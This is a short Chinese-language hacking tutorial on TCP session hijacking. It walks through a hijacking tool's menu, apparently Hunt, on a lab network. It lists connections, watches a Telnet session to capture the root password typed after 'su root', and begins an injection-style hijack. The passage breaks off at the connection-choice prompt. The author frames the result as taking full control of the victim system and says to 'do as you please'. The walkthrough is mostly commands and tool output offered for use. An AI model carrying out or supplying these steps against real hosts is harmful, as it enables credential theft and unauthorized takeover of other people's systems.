黑客技术分析 会话劫持攻击实战讲解

核心提示： l/w/r) list/watch/reset connectionsu) host up testsa) arp/simple hijack (avoids ack storm if arp used)s) simple hijackd) daemons rst/arp/sniff/ma

l/w/r) list/watch/reset connections

u) host up tests

a) arp/simple hijack (avoids ack storm if arp used)

s) simple hijack

d) daemons rst/arp/sniff/mac

o) options

x) exit

*＞ l //查看当前网络上的会话

0）192.168.0.1 [3465] ?192.168.0.20 [23]

//主机A正在Telnet到主机B

--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------

l/w/r) list/watch/reset connections

u) host up tests

a) arp/simple hijack (avoids ack storm if arp used)

s) simple hijack

d) daemons rst/arp/sniff/mac

o) options

x) exit

*＞ w //监视当前网络上的会话

0）192.168.0.1 [3465] ?192.168.0.20 [23]

Choose conn＞0 //选择打算监视的会话。由于我的条件有限，不能模拟多个会话，请多见量。

Dump [s]rc/[d]st/[b]oth [b]＞ //回车

Print sec/dst same charactes y/n [n]＞ //回车

现在就可以监视会话了。主机A输入的一切内容，我们都可以看到。主机A在Telnet并登陆之后，直接su root，password：后边的就是root的密码。现在这个系统已经完全由你所控制了，自由发挥吧！

--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------

l/w/r) list/watch/reset connections

u) host up tests

a) arp/simple hijack (avoids ack storm if arp used)

s) simple hijack

d) daemons rst/arp/sniff/mac

o) options

x) exit

*＞ s //进行注射式会话劫持

0）192.168.0.1 [3465] ?192.168.0.20 [23]

choose conn＞ 0